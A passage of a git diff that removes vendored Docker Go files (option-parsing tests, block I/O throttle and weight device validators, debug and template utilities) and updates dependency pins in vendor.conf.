range format for --expose: 8080-NaN/tcp, error: strconv.ParseUint: parsing "NaN": invalid syntax`, - "1234567890-8080/tcp": `invalid range format for --expose: 1234567890-8080/tcp, error: strconv.ParseUint: parsing "1234567890": value out of range`, - } - valids := map[string][]nat.Port{ - "8080/tcp": {"8080/tcp"}, - "8080/udp": {"8080/udp"}, - "8080/ncp": {"8080/ncp"}, - "8080-8080/udp": {"8080/udp"}, - "8080-8082/tcp": {"8080/tcp", "8081/tcp", "8082/tcp"}, - } - for expose, expectedError := range invalids { - if _, _, _, err := parseRun([]string{fmt.Sprintf("--expose=%v", expose), "img", "cmd"}); err == nil || err.Error() != expectedError { - t.Fatalf("Expected error '%v' with '--expose=%v', got '%v'", expectedError, expose, err) - } - } - for expose, exposedPorts := range valids { - config, _, _, err := parseRun([]string{fmt.Sprintf("--expose=%v", expose), "img", "cmd"}) - if err != nil { - t.Fatal(err) - } - if len(config.ExposedPorts) != len(exposedPorts) { - t.Fatalf("Expected %v exposed port, got %v", len(exposedPorts), len(config.ExposedPorts)) - } - for _, port := range exposedPorts { - if _, ok := config.ExposedPorts[port]; !ok { - t.Fatalf("Expected %v, got %v", exposedPorts, config.ExposedPorts) - } - } - } - // Merge with actual published port - config, _, _, err := parseRun([]string{"--publish=80", "--expose=80-81/tcp", "img", "cmd"}) - if err != nil { - t.Fatal(err) - } - if len(config.ExposedPorts) != 2 { - t.Fatalf("Expected 2 exposed ports, got %v", config.ExposedPorts) - } - ports := []nat.Port{"80/tcp", "81/tcp"} - for _, port := range ports { - if _, ok := config.ExposedPorts[port]; !ok { - t.Fatalf("Expected %v, got %v", ports, config.ExposedPorts) - } - } -} - -func TestParseDevice(t *testing.T) { - valids := map[string]container.DeviceMapping{ - "/dev/snd": { - PathOnHost: "/dev/snd", - PathInContainer: "/dev/snd", - CgroupPermissions: "rwm", - }, - "/dev/snd:rw": { - PathOnHost: "/dev/snd", - PathInContainer: "/dev/snd", - 
CgroupPermissions: "rw", - }, - "/dev/snd:/something": { - PathOnHost: "/dev/snd", - PathInContainer: "/something", - CgroupPermissions: "rwm", - }, - "/dev/snd:/something:rw": { - PathOnHost: "/dev/snd", - PathInContainer: "/something", - CgroupPermissions: "rw", - }, - } - for device, deviceMapping := range valids { - _, hostconfig, _, err := parseRun([]string{fmt.Sprintf("--device=%v", device), "img", "cmd"}) - if err != nil { - t.Fatal(err) - } - if len(hostconfig.Devices) != 1 { - t.Fatalf("Expected 1 devices, got %v", hostconfig.Devices) - } - if hostconfig.Devices[0] != deviceMapping { - t.Fatalf("Expected %v, got %v", deviceMapping, hostconfig.Devices) - } - } - -} - -func TestParseModes(t *testing.T) { - // ipc ko - if _, _, _, err := parseRun([]string{"--ipc=container:", "img", "cmd"}); err == nil || err.Error() != "--ipc: invalid IPC mode" { - t.Fatalf("Expected an error with message '--ipc: invalid IPC mode', got %v", err) - } - // ipc ok - _, hostconfig, _, err := parseRun([]string{"--ipc=host", "img", "cmd"}) - if err != nil { - t.Fatal(err) - } - if !hostconfig.IpcMode.Valid() { - t.Fatalf("Expected a valid IpcMode, got %v", hostconfig.IpcMode) - } - // pid ko - if _, _, _, err := parseRun([]string{"--pid=container:", "img", "cmd"}); err == nil || err.Error() != "--pid: invalid PID mode" { - t.Fatalf("Expected an error with message '--pid: invalid PID mode', got %v", err) - } - // pid ok - _, hostconfig, _, err = parseRun([]string{"--pid=host", "img", "cmd"}) - if err != nil { - t.Fatal(err) - } - if !hostconfig.PidMode.Valid() { - t.Fatalf("Expected a valid PidMode, got %v", hostconfig.PidMode) - } - // uts ko - if _, _, _, err := parseRun([]string{"--uts=container:", "img", "cmd"}); err == nil || err.Error() != "--uts: invalid UTS mode" { - t.Fatalf("Expected an error with message '--uts: invalid UTS mode', got %v", err) - } - // uts ok - _, hostconfig, _, err = parseRun([]string{"--uts=host", "img", "cmd"}) - if err != nil { - t.Fatal(err) - } - 
if !hostconfig.UTSMode.Valid() { - t.Fatalf("Expected a valid UTSMode, got %v", hostconfig.UTSMode) - } - // shm-size ko - if _, _, _, err = parseRun([]string{"--shm-size=a128m", "img", "cmd"}); err == nil || err.Error() != "invalid size: 'a128m'" { - t.Fatalf("Expected an error with message 'invalid size: a128m', got %v", err) - } - // shm-size ok - _, hostconfig, _, err = parseRun([]string{"--shm-size=128m", "img", "cmd"}) - if err != nil { - t.Fatal(err) - } - if hostconfig.ShmSize != 134217728 { - t.Fatalf("Expected a valid ShmSize, got %d", hostconfig.ShmSize) - } -} - -func TestParseRestartPolicy(t *testing.T) { - invalids := map[string]string{ - "always:2:3": "invalid restart policy format", - "on-failure:invalid": "maximum retry count must be an integer", - } - valids := map[string]container.RestartPolicy{ - "": {}, - "always": { - Name: "always", - MaximumRetryCount: 0, - }, - "on-failure:1": { - Name: "on-failure", - MaximumRetryCount: 1, - }, - } - for restart, expectedError := range invalids { - if _, _, _, err := parseRun([]string{fmt.Sprintf("--restart=%s", restart), "img", "cmd"}); err == nil || err.Error() != expectedError { - t.Fatalf("Expected an error with message '%v' for %v, got %v", expectedError, restart, err) - } - } - for restart, expected := range valids { - _, hostconfig, _, err := parseRun([]string{fmt.Sprintf("--restart=%v", restart), "img", "cmd"}) - if err != nil { - t.Fatal(err) - } - if hostconfig.RestartPolicy != expected { - t.Fatalf("Expected %v, got %v", expected, hostconfig.RestartPolicy) - } - } -} - -func TestParseHealth(t *testing.T) { - checkOk := func(args ...string) *container.HealthConfig { - config, _, _, err := parseRun(args) - if err != nil { - t.Fatalf("%#v: %v", args, err) - } - return config.Healthcheck - } - checkError := func(expected string, args ...string) { - config, _, _, err := parseRun(args) - if err == nil { - t.Fatalf("Expected error, but got %#v", config) - } - if err.Error() != expected { - 
t.Fatalf("Expected %#v, got %#v", expected, err) - } - } - health := checkOk("--no-healthcheck", "img", "cmd") - if health == nil || len(health.Test) != 1 || health.Test[0] != "NONE" { - t.Fatalf("--no-healthcheck failed: %#v", health) - } - - health = checkOk("--health-cmd=/check.sh -q", "img", "cmd") - if len(health.Test) != 2 || health.Test[0] != "CMD-SHELL" || health.Test[1] != "/check.sh -q" { - t.Fatalf("--health-cmd: got %#v", health.Test) - } - if health.Timeout != 0 { - t.Fatalf("--health-cmd: timeout = %f", health.Timeout) - } - - checkError("--no-healthcheck conflicts with --health-* options", - "--no-healthcheck", "--health-cmd=/check.sh -q", "img", "cmd") - - health = checkOk("--health-timeout=2s", "--health-retries=3", "--health-interval=4.5s", "img", "cmd") - if health.Timeout != 2*time.Second || health.Retries != 3 || health.Interval != 4500*time.Millisecond { - t.Fatalf("--health-*: got %#v", health) - } -} - -func TestParseLoggingOpts(t *testing.T) { - // logging opts ko - if _, _, _, err := parseRun([]string{"--log-driver=none", "--log-opt=anything", "img", "cmd"}); err == nil || err.Error() != "invalid logging opts for driver none" { - t.Fatalf("Expected an error with message 'invalid logging opts for driver none', got %v", err) - } - // logging opts ok - _, hostconfig, _, err := parseRun([]string{"--log-driver=syslog", "--log-opt=something", "img", "cmd"}) - if err != nil { - t.Fatal(err) - } - if hostconfig.LogConfig.Type != "syslog" || len(hostconfig.LogConfig.Config) != 1 { - t.Fatalf("Expected a 'syslog' LogConfig with one config, got %v", hostconfig.RestartPolicy) - } -} - -func TestParseEnvfileVariables(t *testing.T) { - e := "open nonexistent: no such file or directory" - if runtime.GOOS == "windows" { - e = "open nonexistent: The system cannot find the file specified." 
- } - // env ko - if _, _, _, err := parseRun([]string{"--env-file=nonexistent", "img", "cmd"}); err == nil || err.Error() != e { - t.Fatalf("Expected an error with message '%s', got %v", e, err) - } - // env ok - config, _, _, err := parseRun([]string{"--env-file=fixtures/valid.env", "img", "cmd"}) - if err != nil { - t.Fatal(err) - } - if len(config.Env) != 1 || config.Env[0] != "ENV1=value1" { - t.Fatalf("Expected a config with [ENV1=value1], got %v", config.Env) - } - config, _, _, err = parseRun([]string{"--env-file=fixtures/valid.env", "--env=ENV2=value2", "img", "cmd"}) - if err != nil { - t.Fatal(err) - } - if len(config.Env) != 2 || config.Env[0] != "ENV1=value1" || config.Env[1] != "ENV2=value2" { - t.Fatalf("Expected a config with [ENV1=value1 ENV2=value2], got %v", config.Env) - } -} - -func TestParseEnvfileVariablesWithBOMUnicode(t *testing.T) { - // UTF8 with BOM - config, _, _, err := parseRun([]string{"--env-file=fixtures/utf8.env", "img", "cmd"}) - if err != nil { - t.Fatal(err) - } - env := []string{"FOO=BAR", "HELLO=" + string([]byte{0xe6, 0x82, 0xa8, 0xe5, 0xa5, 0xbd}), "BAR=FOO"} - if len(config.Env) != len(env) { - t.Fatalf("Expected a config with %d env variables, got %v: %v", len(env), len(config.Env), config.Env) - } - for i, v := range env { - if config.Env[i] != v { - t.Fatalf("Expected a config with [%s], got %v", v, []byte(config.Env[i])) - } - } - - // UTF16 with BOM - e := "contains invalid utf8 bytes at line" - if _, _, _, err := parseRun([]string{"--env-file=fixtures/utf16.env", "img", "cmd"}); err == nil || !strings.Contains(err.Error(), e) { - t.Fatalf("Expected an error with message '%s', got %v", e, err) - } - // UTF16BE with BOM - if _, _, _, err := parseRun([]string{"--env-file=fixtures/utf16be.env", "img", "cmd"}); err == nil || !strings.Contains(err.Error(), e) { - t.Fatalf("Expected an error with message '%s', got %v", e, err) - } -} - -func TestParseLabelfileVariables(t *testing.T) { - e := "open nonexistent: no such file 
or directory" - if runtime.GOOS == "windows" { - e = "open nonexistent: The system cannot find the file specified." - } - // label ko - if _, _, _, err := parseRun([]string{"--label-file=nonexistent", "img", "cmd"}); err == nil || err.Error() != e { - t.Fatalf("Expected an error with message '%s', got %v", e, err) - } - // label ok - config, _, _, err := parseRun([]string{"--label-file=fixtures/valid.label", "img", "cmd"}) - if err != nil { - t.Fatal(err) - } - if len(config.Labels) != 1 || config.Labels["LABEL1"] != "value1" { - t.Fatalf("Expected a config with [LABEL1:value1], got %v", config.Labels) - } - config, _, _, err = parseRun([]string{"--label-file=fixtures/valid.label", "--label=LABEL2=value2", "img", "cmd"}) - if err != nil { - t.Fatal(err) - } - if len(config.Labels) != 2 || config.Labels["LABEL1"] != "value1" || config.Labels["LABEL2"] != "value2" { - t.Fatalf("Expected a config with [LABEL1:value1 LABEL2:value2], got %v", config.Labels) - } -} - -func TestParseEntryPoint(t *testing.T) { - config, _, _, err := parseRun([]string{"--entrypoint=anything", "cmd", "img"}) - if err != nil { - t.Fatal(err) - } - if len(config.Entrypoint) != 1 && config.Entrypoint[0] != "anything" { - t.Fatalf("Expected entrypoint 'anything', got %v", config.Entrypoint) - } -} - -func TestValidateLink(t *testing.T) { - valid := []string{ - "name", - "dcdfbe62ecd0:alias", - "7a67485460b7642516a4ad82ecefe7f57d0c4916f530561b71a50a3f9c4e33da", - "angry_torvalds:linus", - } - invalid := map[string]string{ - "": "empty string specified for links", - "too:much:of:it": "bad format for links: too:much:of:it", - } - - for _, link := range valid { - if _, err := ValidateLink(link); err != nil { - t.Fatalf("ValidateLink(`%q`) should succeed: error %q", link, err) - } - } - - for link, expectedError := range invalid { - if _, err := ValidateLink(link); err == nil { - t.Fatalf("ValidateLink(`%q`) should have failed validation", link) - } else { - if !strings.Contains(err.Error(), 
expectedError) { - t.Fatalf("ValidateLink(`%q`) error should contain %q", link, expectedError) - } - } - } -} - -func TestParseLink(t *testing.T) { - name, alias, err := ParseLink("name:alias") - if err != nil { - t.Fatalf("Expected not to error out on a valid name:alias format but got: %v", err) - } - if name != "name" { - t.Fatalf("Link name should have been name, got %s instead", name) - } - if alias != "alias" { - t.Fatalf("Link alias should have been alias, got %s instead", alias) - } - // short format definition - name, alias, err = ParseLink("name") - if err != nil { - t.Fatalf("Expected not to error out on a valid name only format but got: %v", err) - } - if name != "name" { - t.Fatalf("Link name should have been name, got %s instead", name) - } - if alias != "name" { - t.Fatalf("Link alias should have been name, got %s instead", alias) - } - // empty string link definition is not allowed - if _, _, err := ParseLink(""); err == nil || !strings.Contains(err.Error(), "empty string specified for links") { - t.Fatalf("Expected error 'empty string specified for links' but got: %v", err) - } - // more than two colons are not allowed - if _, _, err := ParseLink("link:alias:wrong"); err == nil || !strings.Contains(err.Error(), "bad format for links: link:alias:wrong") { - t.Fatalf("Expected error 'bad format for links: link:alias:wrong' but got: %v", err) - } -} - -func TestValidateDevice(t *testing.T) { - valid := []string{ - "/home", - "/home:/home", - "/home:/something/else", - "/with space", - "/home:/with space", - "relative:/absolute-path", - "hostPath:/containerPath:r", - "/hostPath:/containerPath:rw", - "/hostPath:/containerPath:mrw", - } - invalid := map[string]string{ - "": "bad format for path: ", - "./": "./ is not an absolute path", - "../": "../ is not an absolute path", - "/:../": "../ is not an absolute path", - "/:path": "path is not an absolute path", - ":": "bad format for path: :", - "/tmp:": " is not an absolute path", - ":test": "bad format 
for path: :test", - ":/test": "bad format for path: :/test", - "tmp:": " is not an absolute path", - ":test:": "bad format for path: :test:", - "::": "bad format for path: ::", - ":::": "bad format for path: :::", - "/tmp:::": "bad format for path: /tmp:::", - ":/tmp::": "bad format for path: :/tmp::", - "path:ro": "ro is not an absolute path", - "path:rr": "rr is not an absolute path", - "a:/b:ro": "bad mode specified: ro", - "a:/b:rr": "bad mode specified: rr", - } - - for _, path := range valid { - if _, err := ValidateDevice(path); err != nil { - t.Fatalf("ValidateDevice(`%q`) should succeed: error %q", path, err) - } - } - - for path, expectedError := range invalid { - if _, err := ValidateDevice(path); err == nil { - t.Fatalf("ValidateDevice(`%q`) should have failed validation", path) - } else { - if err.Error() != expectedError { - t.Fatalf("ValidateDevice(`%q`) error should contain %q, got %q", path, expectedError, err.Error()) - } - } - } -} - -func TestVolumeSplitN(t *testing.T) { - for _, x := range []struct { - input string - n int - expected []string - }{ - {`C:\foo:d:`, -1, []string{`C:\foo`, `d:`}}, - {`:C:\foo:d:`, -1, nil}, - {`/foo:/bar:ro`, 3, []string{`/foo`, `/bar`, `ro`}}, - {`/foo:/bar:ro`, 2, []string{`/foo`, `/bar:ro`}}, - {`C:\foo\:/foo`, -1, []string{`C:\foo\`, `/foo`}}, - - {`d:\`, -1, []string{`d:\`}}, - {`d:`, -1, []string{`d:`}}, - {`d:\path`, -1, []string{`d:\path`}}, - {`d:\path with space`, -1, []string{`d:\path with space`}}, - {`d:\pathandmode:rw`, -1, []string{`d:\pathandmode`, `rw`}}, - {`c:\:d:\`, -1, []string{`c:\`, `d:\`}}, - {`c:\windows\:d:`, -1, []string{`c:\windows\`, `d:`}}, - {`c:\windows:d:\s p a c e`, -1, []string{`c:\windows`, `d:\s p a c e`}}, - {`c:\windows:d:\s p a c e:RW`, -1, []string{`c:\windows`, `d:\s p a c e`, `RW`}}, - {`c:\program files:d:\s p a c e i n h o s t d i r`, -1, []string{`c:\program files`, `d:\s p a c e i n h o s t d i r`}}, - {`0123456789name:d:`, -1, []string{`0123456789name`, `d:`}}, - 
{`MiXeDcAsEnAmE:d:`, -1, []string{`MiXeDcAsEnAmE`, `d:`}}, - {`name:D:`, -1, []string{`name`, `D:`}}, - {`name:D::rW`, -1, []string{`name`, `D:`, `rW`}}, - {`name:D::RW`, -1, []string{`name`, `D:`, `RW`}}, - {`c:/:d:/forward/slashes/are/good/too`, -1, []string{`c:/`, `d:/forward/slashes/are/good/too`}}, - {`c:\Windows`, -1, []string{`c:\Windows`}}, - {`c:\Program Files (x86)`, -1, []string{`c:\Program Files (x86)`}}, - - {``, -1, nil}, - {`.`, -1, []string{`.`}}, - {`..\`, -1, []string{`..\`}}, - {`c:\:..\`, -1, []string{`c:\`, `..\`}}, - {`c:\:d:\:xyzzy`, -1, []string{`c:\`, `d:\`, `xyzzy`}}, - - // Cover directories with one-character name - {`/tmp/x/y:/foo/x/y`, -1, []string{`/tmp/x/y`, `/foo/x/y`}}, - } { - res := volumeSplitN(x.input, x.n) - if len(res) < len(x.expected) { - t.Fatalf("input: %v, expected: %v, got: %v", x.input, x.expected, res) - } - for i, e := range res { - if e != x.expected[i] { - t.Fatalf("input: %v, expected: %v, got: %v", x.input, x.expected, res) - } - } - } -} diff --git a/vendor/github.com/docker/docker/runconfig/opts/throttledevice.go b/vendor/github.com/docker/docker/runconfig/opts/throttledevice.go deleted file mode 100644 index 5024324298..0000000000 --- a/vendor/github.com/docker/docker/runconfig/opts/throttledevice.go +++ /dev/null @@ -1,111 +0,0 @@ -package opts - -import ( - "fmt" - "strconv" - "strings" - - "github.com/docker/docker/api/types/blkiodev" - "github.com/docker/go-units" -) - -// ValidatorThrottleFctType defines a validator function that returns a validated struct and/or an error. -type ValidatorThrottleFctType func(val string) (*blkiodev.ThrottleDevice, error) - -// ValidateThrottleBpsDevice validates that the specified string has a valid device-rate format. 
-func ValidateThrottleBpsDevice(val string) (*blkiodev.ThrottleDevice, error) { - split := strings.SplitN(val, ":", 2) - if len(split) != 2 { - return nil, fmt.Errorf("bad format: %s", val) - } - if !strings.HasPrefix(split[0], "/dev/") { - return nil, fmt.Errorf("bad format for device path: %s", val) - } - rate, err := units.RAMInBytes(split[1]) - if err != nil { - return nil, fmt.Errorf("invalid rate for device: %s. The correct format is :[]. Number must be a positive integer. Unit is optional and can be kb, mb, or gb", val) - } - if rate < 0 { - return nil, fmt.Errorf("invalid rate for device: %s. The correct format is :[]. Number must be a positive integer. Unit is optional and can be kb, mb, or gb", val) - } - - return &blkiodev.ThrottleDevice{ - Path: split[0], - Rate: uint64(rate), - }, nil -} - -// ValidateThrottleIOpsDevice validates that the specified string has a valid device-rate format. -func ValidateThrottleIOpsDevice(val string) (*blkiodev.ThrottleDevice, error) { - split := strings.SplitN(val, ":", 2) - if len(split) != 2 { - return nil, fmt.Errorf("bad format: %s", val) - } - if !strings.HasPrefix(split[0], "/dev/") { - return nil, fmt.Errorf("bad format for device path: %s", val) - } - rate, err := strconv.ParseUint(split[1], 10, 64) - if err != nil { - return nil, fmt.Errorf("invalid rate for device: %s. The correct format is :. Number must be a positive integer", val) - } - if rate < 0 { - return nil, fmt.Errorf("invalid rate for device: %s. The correct format is :. 
Number must be a positive integer", val) - } - - return &blkiodev.ThrottleDevice{ - Path: split[0], - Rate: uint64(rate), - }, nil -} - -// ThrottledeviceOpt defines a map of ThrottleDevices -type ThrottledeviceOpt struct { - values []*blkiodev.ThrottleDevice - validator ValidatorThrottleFctType -} - -// NewThrottledeviceOpt creates a new ThrottledeviceOpt -func NewThrottledeviceOpt(validator ValidatorThrottleFctType) ThrottledeviceOpt { - values := []*blkiodev.ThrottleDevice{} - return ThrottledeviceOpt{ - values: values, - validator: validator, - } -} - -// Set validates a ThrottleDevice and sets its name as a key in ThrottledeviceOpt -func (opt *ThrottledeviceOpt) Set(val string) error { - var value *blkiodev.ThrottleDevice - if opt.validator != nil { - v, err := opt.validator(val) - if err != nil { - return err - } - value = v - } - (opt.values) = append((opt.values), value) - return nil -} - -// String returns ThrottledeviceOpt values as a string. -func (opt *ThrottledeviceOpt) String() string { - var out []string - for _, v := range opt.values { - out = append(out, v.String()) - } - - return fmt.Sprintf("%v", out) -} - -// GetList returns a slice of pointers to ThrottleDevices. -func (opt *ThrottledeviceOpt) GetList() []*blkiodev.ThrottleDevice { - var throttledevice []*blkiodev.ThrottleDevice - throttledevice = append(throttledevice, opt.values...) 
- - return throttledevice -} - -// Type returns the option type -func (opt *ThrottledeviceOpt) Type() string { - return "throttled-device" -} diff --git a/vendor/github.com/docker/docker/runconfig/opts/weightdevice.go b/vendor/github.com/docker/docker/runconfig/opts/weightdevice.go deleted file mode 100644 index 2a5da6da08..0000000000 --- a/vendor/github.com/docker/docker/runconfig/opts/weightdevice.go +++ /dev/null @@ -1,89 +0,0 @@ -package opts - -import ( - "fmt" - "strconv" - "strings" - - "github.com/docker/docker/api/types/blkiodev" -) - -// ValidatorWeightFctType defines a validator function that returns a validated struct and/or an error. -type ValidatorWeightFctType func(val string) (*blkiodev.WeightDevice, error) - -// ValidateWeightDevice validates that the specified string has a valid device-weight format. -func ValidateWeightDevice(val string) (*blkiodev.WeightDevice, error) { - split := strings.SplitN(val, ":", 2) - if len(split) != 2 { - return nil, fmt.Errorf("bad format: %s", val) - } - if !strings.HasPrefix(split[0], "/dev/") { - return nil, fmt.Errorf("bad format for device path: %s", val) - } - weight, err := strconv.ParseUint(split[1], 10, 0) - if err != nil { - return nil, fmt.Errorf("invalid weight for device: %s", val) - } - if weight > 0 && (weight < 10 || weight > 1000) { - return nil, fmt.Errorf("invalid weight for device: %s", val) - } - - return &blkiodev.WeightDevice{ - Path: split[0], - Weight: uint16(weight), - }, nil -} - -// WeightdeviceOpt defines a map of WeightDevices -type WeightdeviceOpt struct { - values []*blkiodev.WeightDevice - validator ValidatorWeightFctType -} - -// NewWeightdeviceOpt creates a new WeightdeviceOpt -func NewWeightdeviceOpt(validator ValidatorWeightFctType) WeightdeviceOpt { - values := []*blkiodev.WeightDevice{} - return WeightdeviceOpt{ - values: values, - validator: validator, - } -} - -// Set validates a WeightDevice and sets its name as a key in WeightdeviceOpt -func (opt *WeightdeviceOpt) Set(val 
string) error { - var value *blkiodev.WeightDevice - if opt.validator != nil { - v, err := opt.validator(val) - if err != nil { - return err - } - value = v - } - (opt.values) = append((opt.values), value) - return nil -} - -// String returns WeightdeviceOpt values as a string. -func (opt *WeightdeviceOpt) String() string { - var out []string - for _, v := range opt.values { - out = append(out, v.String()) - } - - return fmt.Sprintf("%v", out) -} - -// GetList returns a slice of pointers to WeightDevices. -func (opt *WeightdeviceOpt) GetList() []*blkiodev.WeightDevice { - var weightdevice []*blkiodev.WeightDevice - for _, v := range opt.values { - weightdevice = append(weightdevice, v) - } - - return weightdevice -} - -// Type returns the option type -func (opt *WeightdeviceOpt) Type() string { - return "weighted-device" -} diff --git a/vendor/github.com/docker/docker/utils/debug.go b/vendor/github.com/docker/docker/utils/debug.go deleted file mode 100644 index d203891129..0000000000 --- a/vendor/github.com/docker/docker/utils/debug.go +++ /dev/null @@ -1,26 +0,0 @@ -package utils - -import ( - "os" - - "github.com/Sirupsen/logrus" -) - -// EnableDebug sets the DEBUG env var to true -// and makes the logger to log at debug level. -func EnableDebug() { - os.Setenv("DEBUG", "1") - logrus.SetLevel(logrus.DebugLevel) -} - -// DisableDebug sets the DEBUG env var to false -// and makes the logger to log at info level. -func DisableDebug() { - os.Setenv("DEBUG", "") - logrus.SetLevel(logrus.InfoLevel) -} - -// IsDebugEnabled checks whether the debug flag is set or not. 
-func IsDebugEnabled() bool { - return os.Getenv("DEBUG") != "" -} diff --git a/vendor/github.com/docker/docker/utils/process_windows.go b/vendor/github.com/docker/docker/utils/process_windows.go deleted file mode 100644 index 03cb855197..0000000000 --- a/vendor/github.com/docker/docker/utils/process_windows.go +++ /dev/null @@ -1,20 +0,0 @@ -package utils - -// IsProcessAlive returns true if process with a given pid is running. -func IsProcessAlive(pid int) bool { - // TODO Windows containerd. Not sure this is needed - // p, err := os.FindProcess(pid) - // if err == nil { - // return true - // } - return false -} - -// KillProcess force-stops a process. -func KillProcess(pid int) { - // TODO Windows containerd. Not sure this is needed - // p, err := os.FindProcess(pid) - // if err == nil { - // p.Kill() - // } -} diff --git a/vendor/github.com/docker/docker/utils/templates/templates.go b/vendor/github.com/docker/docker/utils/templates/templates.go deleted file mode 100644 index 91c376f38f..0000000000 --- a/vendor/github.com/docker/docker/utils/templates/templates.go +++ /dev/null @@ -1,42 +0,0 @@ -package templates - -import ( - "encoding/json" - "strings" - "text/template" -) - -// basicFunctions are the set of initial -// functions provided to every template. -var basicFunctions = template.FuncMap{ - "json": func(v interface{}) string { - a, _ := json.Marshal(v) - return string(a) - }, - "split": strings.Split, - "join": strings.Join, - "title": strings.Title, - "lower": strings.ToLower, - "upper": strings.ToUpper, - "pad": padWithSpace, -} - -// Parse creates a new annonymous template with the basic functions -// and parses the given format. -func Parse(format string) (*template.Template, error) { - return NewParse("", format) -} - -// NewParse creates a new tagged template with the basic functions -// and parses the given format. 
-func NewParse(tag, format string) (*template.Template, error) { - return template.New(tag).Funcs(basicFunctions).Parse(format) -} - -// padWithSpace adds whitespace to the input if the input is non-empty -func padWithSpace(source string, prefix, suffix int) string { - if source == "" { - return source - } - return strings.Repeat(" ", prefix) + source + strings.Repeat(" ", suffix) -} diff --git a/vendor/github.com/docker/docker/utils/templates/templates_test.go b/vendor/github.com/docker/docker/utils/templates/templates_test.go deleted file mode 100644 index dd42901aed..0000000000 --- a/vendor/github.com/docker/docker/utils/templates/templates_test.go +++ /dev/null @@ -1,38 +0,0 @@ -package templates - -import ( - "bytes" - "testing" -) - -func TestParseStringFunctions(t *testing.T) { - tm, err := Parse(`{{join (split . ":") "/"}}`) - if err != nil { - t.Fatal(err) - } - - var b bytes.Buffer - if err := tm.Execute(&b, "text:with:colon"); err != nil { - t.Fatal(err) - } - want := "text/with/colon" - if b.String() != want { - t.Fatalf("expected %s, got %s", want, b.String()) - } -} - -func TestNewParse(t *testing.T) { - tm, err := NewParse("foo", "this is a {{ . }}") - if err != nil { - t.Fatal(err) - } - - var b bytes.Buffer - if err := tm.Execute(&b, "string"); err != nil { - t.Fatal(err) - } - want := "this is a string" - if b.String() != want { - t.Fatalf("expected %s, got %s", want, b.String()) - } -} diff --git a/vendor/github.com/docker/docker/utils/utils.go b/vendor/github.com/docker/docker/utils/utils.go deleted file mode 100644 index d3dd00abf4..0000000000 --- a/vendor/github.com/docker/docker/utils/utils.go +++ /dev/null @@ -1,87 +0,0 @@ -package utils - -import ( - "fmt" - "io/ioutil" - "os" - "runtime" - "strings" - - "github.com/docker/docker/pkg/archive" - "github.com/docker/docker/pkg/stringid" -) - -var globalTestID string - -// TestDirectory creates a new temporary directory and returns its path. 
-// The contents of directory at path `templateDir` is copied into the -// new directory. -func TestDirectory(templateDir string) (dir string, err error) { - if globalTestID == "" { - globalTestID = stringid.GenerateNonCryptoID()[:4] - } - prefix := fmt.Sprintf("docker-test%s-%s-", globalTestID, GetCallerName(2)) - if prefix == "" { - prefix = "docker-test-" - } - dir, err = ioutil.TempDir("", prefix) - if err = os.Remove(dir); err != nil { - return - } - if templateDir != "" { - if err = archive.CopyWithTar(templateDir, dir); err != nil { - return - } - } - return -} - -// GetCallerName introspects the call stack and returns the name of the -// function `depth` levels down in the stack. -func GetCallerName(depth int) string { - // Use the caller function name as a prefix. - // This helps trace temp directories back to their test. - pc, _, _, _ := runtime.Caller(depth + 1) - callerLongName := runtime.FuncForPC(pc).Name() - parts := strings.Split(callerLongName, ".") - callerShortName := parts[len(parts)-1] - return callerShortName -} - -// ReplaceOrAppendEnvValues returns the defaults with the overrides either -// replaced by env key or appended to the list -func ReplaceOrAppendEnvValues(defaults, overrides []string) []string { - cache := make(map[string]int, len(defaults)) - for i, e := range defaults { - parts := strings.SplitN(e, "=", 2) - cache[parts[0]] = i - } - - for _, value := range overrides { - // Values w/o = means they want this env to be removed/unset. 
- if !strings.Contains(value, "=") { - if i, exists := cache[value]; exists { - defaults[i] = "" // Used to indicate it should be removed - } - continue - } - - // Just do a normal set/update - parts := strings.SplitN(value, "=", 2) - if i, exists := cache[parts[0]]; exists { - defaults[i] = value - } else { - defaults = append(defaults, value) - } - } - - // Now remove all entries that we want to "unset" - for i := 0; i < len(defaults); i++ { - if defaults[i] == "" { - defaults = append(defaults[:i], defaults[i+1:]...) - i-- - } - } - - return defaults -} diff --git a/vendor/github.com/docker/docker/vendor.conf b/vendor/github.com/docker/docker/vendor.conf index bb7718bc42..25f74900d0 100644 --- a/vendor/github.com/docker/docker/vendor.conf +++ b/vendor/github.com/docker/docker/vendor.conf @@ -1,116 +1,139 @@ # the following lines are in sorted order, FYI -github.com/Azure/go-ansiterm 388960b655244e76e24c75f48631564eaefade62 -github.com/Microsoft/hcsshim v0.5.9 -github.com/Microsoft/go-winio v0.3.8 -github.com/Sirupsen/logrus v0.11.0 -github.com/davecgh/go-spew 6d212800a42e8ab5c146b8ace3490ee17e5225f9 +github.com/Azure/go-ansiterm d6e3b3328b783f23731bc4d058875b0371ff8109 +github.com/Microsoft/hcsshim v0.6.11 +github.com/Microsoft/go-winio v0.4.7 github.com/docker/libtrust 9cbd2a1374f46905c68a4eb3694a130610adc62a github.com/go-check/check 4ed411733c5785b40214c70bce814c3a3a689609 https://github.com/cpuguy83/check.git +github.com/golang/gddo 9b12a26f3fbd7397dee4e20939ddca719d840d2a github.com/gorilla/context v1.1 github.com/gorilla/mux v1.1 +github.com/Microsoft/opengcs v0.3.6 github.com/kr/pty 5cf931ef8f -github.com/mattn/go-shellwords v1.0.0 -github.com/mattn/go-sqlite3 v1.1.0 +github.com/mattn/go-shellwords v1.0.3 +github.com/sirupsen/logrus v1.0.3 github.com/tchap/go-patricia v2.2.6 github.com/vdemeester/shakers 24d7f1d6a71aa5d9cbe7390e4afb66b7eef9e1b3 -# forked golang.org/x/net package includes a patch for lazy loading trace templates -golang.org/x/net 
